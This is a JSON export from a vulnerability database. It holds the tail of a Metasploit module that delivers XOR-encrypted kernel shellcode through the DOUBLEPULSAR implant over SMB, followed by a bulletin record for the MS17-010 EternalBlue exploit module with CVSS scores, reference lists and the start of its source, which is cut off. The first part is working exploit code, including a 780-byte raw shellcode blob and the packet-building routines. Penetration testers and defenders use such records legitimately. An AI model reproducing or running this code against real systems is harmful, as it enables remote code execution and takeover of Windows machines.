CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect(versions: [1])\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "79b03fa9178806f1694441cff96d84a3"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "a350165a58d78e6a7f1ec63091a5caba"}, {"key": "published", "hash": "c25dabffe89097874a062017ca347cc8"}, {"key": "references", "hash": "2a4acb977d851155649ad6e4f1698975"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "fe7cd07cb53ebe88d1bb8c3cb4d4de83"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "hash": "8ee0b30d80e6b858e1e5e34e000a9f0bb0bf85330d3390f24f1a662b5f47c1c0", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.\n", "published": "2018-03-02T12:08:19", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/RiskSense-Ops/MS17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-10-07T20:17:30", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-07T20:17:30", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-07T20:17:30", "rev": 2, "value": 7.7, "vector": "NONE"}}, "hash": "06b3984d879186ec915779309328127cf1c14fae881e41215a541e8693e50087", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "f01bc7580a1d9e48a4a0685bbba5abb4", "key": "title"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e80bef8ab7c34172a2f61c17200cdbec", "key": "modified"}, {"hash": "f1292e4e1bddcf376f3f8330160fdd6b", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e2dd14eb78ca67b48750e2bf14c1af6d", "key": "published"}, {"hash": "e399617d745f01fecac811333e03113c", "key": "description"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "immutableFields": [], "lastseen": "2020-10-07T20:17:30", "modified": "2020-10-02T20:00:37", "objectVersion": "1.5", "published": "2018-03-02T12:08:19", "references": ["https://github.com/RiskSense-Ops/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 5795}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-07T20:17:30"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.", "enchantments": {}, "hash": "", "history": [], "href": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2017-07-24T19:27:03", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "2017-07-24T13:26:21", "objectVersion": "1.4", "published": "2017-05-16T20:40:03", "references": ["#", "http://cvedetails.com/cve/cve-2017-0144", "http://cvedetails.com/cve/cve-2017-0143", "https://github.com/RiskSense-Ops/MS17-010", "http://cvedetails.com/cve/cve-2017-0146", "http://cvedetails.com/cve/cve-2017-0148", "http://www.microsoft.com/technet/security/bulletin/MS17-010.mspx", "http://cvedetails.com/cve/cve-2017-0145", "http://cvedetails.com/cve/cve-2017-0147"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n },\n\n 'Author' => [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'AKA', 'ETERNALBLUE' ],\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143' ],\n [ 'CVE', '2017-0144' ],\n [ 'CVE', '2017-0145' ],\n [ 'CVE', '2017-0146' ],\n [ 'CVE', '2017-0147' ],\n [ 'CVE', '2017-0148' ],\n [ 